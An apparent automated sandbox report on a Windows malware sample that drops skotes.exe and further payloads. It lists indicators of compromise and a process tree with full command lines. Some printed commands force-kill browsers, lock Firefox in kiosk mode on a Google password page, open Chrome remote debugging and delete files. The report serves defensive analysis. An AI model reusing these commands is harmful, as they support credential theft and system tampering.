Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2024 skotes.exe 2884 Ta3ZyUR.exe 2884 Ta3ZyUR.exe 2884 Ta3ZyUR.exe 2884 Ta3ZyUR.exe 1532 m5UP2Yj.exe 1532 m5UP2Yj.exe 2032 7aencsM.exe 2032 7aencsM.exe 2840 oVpNTUm.exe 1472 chrome.exe 1472 chrome.exe 2032 7aencsM.exe 2312 3omTNLZ.exe 2292 C3hYpvm.exe 2312 3omTNLZ.exe 2312 3omTNLZ.exe 2312 3omTNLZ.exe 2312 3omTNLZ.exe 2840 oVpNTUm.exe 1952 Bjkm5hE.exe 1952 Bjkm5hE.exe 1952 Bjkm5hE.exe 1952 Bjkm5hE.exe 1732 bovjd.exe 2032 7aencsM.exe 2132 oVpNTUm.exe 1460 powershell.exe 2132 oVpNTUm.exe 2440 3omTNLZ.exe 2540 gmsbuho.exe 2440 3omTNLZ.exe 2440 3omTNLZ.exe 2440 3omTNLZ.exe 2440 3omTNLZ.exe 1988 7aencsM.exe 1600 d2YQIJa.exe 1788 monthdragon.exe 1788 monthdragon.exe 1788 monthdragon.exe 1788 monthdragon.exe 2392 DTQCxXZ.exe 2392 DTQCxXZ.exe 2392 DTQCxXZ.exe 2392 DTQCxXZ.exe 1600 d2YQIJa.exe 1600 d2YQIJa.exe 1600 d2YQIJa.exe 1600 d2YQIJa.exe 2888 Ta3ZyUR.exe 2888 Ta3ZyUR.exe 2888 Ta3ZyUR.exe 2888 Ta3ZyUR.exe 1960 powershell.exe 1960 powershell.exe 1960 powershell.exe 2152 powershell.exe 2488 TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE 2124 powershell.exe 2060 powershell.exe 2488 TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE 2488 TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 2292 C3hYpvm.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeShutdownPrivilege 1472 chrome.exe Token: SeDebugPrivilege 2516 C3hYpvm.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 2488 TempA7KHRJXYUE7ZDJOTW0YLTXZTZCNRETEP.EXE Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 640 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 2640 taskkill.exe Token: SeDebugPrivilege 1844 taskkill.exe Token: SeDebugPrivilege 2060 taskkill.exe Token: SeDebugPrivilege 1788 firefox.exe Token: SeDebugPrivilege 1788 firefox.exe Token: SeDebugPrivilege 936 4c71e9f822.exe Token: SeDebugPrivilege 3960 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 2612 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 2740 taskkill.exe Token: SeDebugPrivilege 3092 firefox.exe Token: SeDebugPrivilege 3092 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 1472 chrome.exe 680 amnew.exe 2948 dc86b89870.exe 2948 dc86b89870.exe 2948 dc86b89870.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 1788 firefox.exe 1788 firefox.exe 1788 firefox.exe 1788 firefox.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2140 50f96f9f6a.exe 2140 50f96f9f6a.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 2948 dc86b89870.exe 2948 dc86b89870.exe 2948 dc86b89870.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 1788 firefox.exe 1788 firefox.exe 1788 firefox.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2336 2266dcdb00.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2140 50f96f9f6a.exe 2140 50f96f9f6a.exe 2140 50f96f9f6a.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 3092 firefox.exe 3092 firefox.exe 3092 firefox.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe 2268 eaa92bd248.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2292 C3hYpvm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2392 wrote to memory of 2024 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 30 PID 2392 wrote to memory of 2024 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 30 PID 2392 wrote to memory of 2024 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 30 PID 2392 wrote to memory of 2024 2392 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 30 PID 2024 wrote to memory of 1248 2024 skotes.exe 32 PID 2024 wrote to memory of 1248 2024 skotes.exe 32 PID 2024 wrote to memory of 1248 2024 skotes.exe 32 PID 2024 wrote to memory of 1248 2024 skotes.exe 32 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 2884 1248 Ta3ZyUR.exe 33 PID 1248 wrote to memory of 624 1248 Ta3ZyUR.exe 34 PID 1248 wrote to memory of 624 1248 Ta3ZyUR.exe 34 PID 1248 wrote to memory of 624 1248 Ta3ZyUR.exe 34 PID 1248 wrote to memory of 624 1248 Ta3ZyUR.exe 34 PID 2024 wrote to memory of 2312 2024 skotes.exe 35 PID 2024 wrote to memory of 2312 2024 skotes.exe 35 PID 2024 wrote to memory of 2312 2024 skotes.exe 35 PID 2024 wrote to memory of 2312 2024 skotes.exe 35 PID 2312 wrote to memory of 2420 2312 qFqSpAp.exe 37 PID 2312 wrote to memory of 2420 2312 qFqSpAp.exe 37 PID 2312 wrote to memory of 2420 2312 qFqSpAp.exe 37 PID 2312 wrote to memory of 2420 2312 qFqSpAp.exe 37 PID 2024 wrote to memory of 1532 2024 skotes.exe 38 PID 2024 wrote to memory of 1532 2024 skotes.exe 38 PID 2024 wrote to memory of 1532 2024 skotes.exe 38 PID 2024 wrote to memory of 1532 2024 skotes.exe 38 PID 2024 wrote to memory of 880 2024 skotes.exe 39 PID 2024 wrote to memory of 880 2024 skotes.exe 39 PID 2024 wrote to memory of 880 2024 skotes.exe 39 PID 2024 wrote to memory of 880 2024 skotes.exe 39 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2032 880 7aencsM.exe 40 PID 880 wrote to memory of 2568 880 7aencsM.exe 41 PID 880 wrote to memory of 2568 880 7aencsM.exe 41 PID 880 wrote to memory of 2568 880 7aencsM.exe 41 PID 880 wrote to memory of 2568 880 7aencsM.exe 41 PID 2024 wrote to memory of 2292 2024 skotes.exe 44 PID 2024 wrote to memory of 2292 2024 skotes.exe 44 PID 2024 wrote to memory of 2292 2024 skotes.exe 44 PID 2024 wrote to memory of 2292 2024 skotes.exe 44 PID 1532 wrote to memory of 316 1532 m5UP2Yj.exe 45 PID 1532 wrote to memory of 316 1532 m5UP2Yj.exe 45 PID 1532 wrote to memory of 316 1532 m5UP2Yj.exe 45 PID 1532 wrote to memory of 316 1532 m5UP2Yj.exe 45 PID 2032 wrote to memory of 1472 2032 7aencsM.exe 46 PID 2032 wrote to memory of 1472 2032 7aencsM.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe"C:\Users\Admin\AppData\Local\Temp\c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:624
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 8204⤵
- Loads dropped DLL
- Program crash
PID:2420
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 8964⤵
- Loads dropped DLL
- Program crash
PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1472 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2439758,0x7fef2439768,0x7fef24397786⤵PID:1648
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:26⤵PID:820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:86⤵PID:2872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1500 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:86⤵PID:2104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2544 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:26⤵PID:824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1420 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3336 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:86⤵PID:772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1336,i,4230705843815753071,6531107970150634274,131072 /prefetch:86⤵PID:2304
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5xbie" & exit5⤵
- System Location Discovery: System Language Discovery
PID:1960 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:684
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2292
-
-
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2840
-
-
C:\Users\Admin\AppData\Local\Temp\1086918001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1086918001\C3hYpvm.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:680 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:700 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 5606⤵
- Loads dropped DLL
- Program crash
PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008220101\2266dcdb00.exe"C:\Users\Admin\AppData\Local\Temp\10008220101\2266dcdb00.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2336 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:888
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1788 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.0.654335574\521194867" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1184 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63011ce2-7edd-4046-8c7b-8192682cdf22} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1280 115bae58 gpu8⤵PID:2328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.1.321126141\845584903" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39bc8e17-3007-4cf6-bb0b-087e489c5e95} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1480 f74858 socket8⤵PID:744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.2.1931336929\1753825766" -childID 1 -isForBrowser -prefsHandle 2116 -prefMapHandle 2112 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54be2a4f-3680-41ac-94af-e62c5121519c} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2088 18c94958 tab8⤵PID:2952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.3.1914793214\754995230" -childID 2 -isForBrowser -prefsHandle 2584 -prefMapHandle 2580 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c18bcce-7a1b-4b0e-a758-d77054475fd8} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2596 1c13cb58 tab8⤵PID:3088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.4.459113487\2144010710" -childID 3 -isForBrowser -prefsHandle 3688 -prefMapHandle 3732 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0a48d57-7657-49c0-8382-a87654b9d198} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3752 1d97b858 tab8⤵PID:4004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.5.1500790529\560974297" -childID 4 -isForBrowser -prefsHandle 3964 -prefMapHandle 3876 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50eeeb70-92bf-4bb7-a9aa-ae6ea537a676} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3976 1f6c4058 tab8⤵PID:1508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.6.1669434005\577791120" -childID 5 -isForBrowser -prefsHandle 4108 -prefMapHandle 4112 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {093260dc-9f8c-41bb-ba42-e535003a7664} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 4092 21890258 tab8⤵PID:2864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.7.943890621\1793231705" -parentBuildID 20221007134813 -prefsHandle 1280 -prefMapHandle 2316 -prefsLen 26531 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb00f5a3-1f97-40c7-9af7-c33ab56d8fee} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1816 f5e458 gpu8⤵PID:1996
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008230101\a871065581.exe"C:\Users\Admin\AppData\Local\Temp\10008230101\a871065581.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
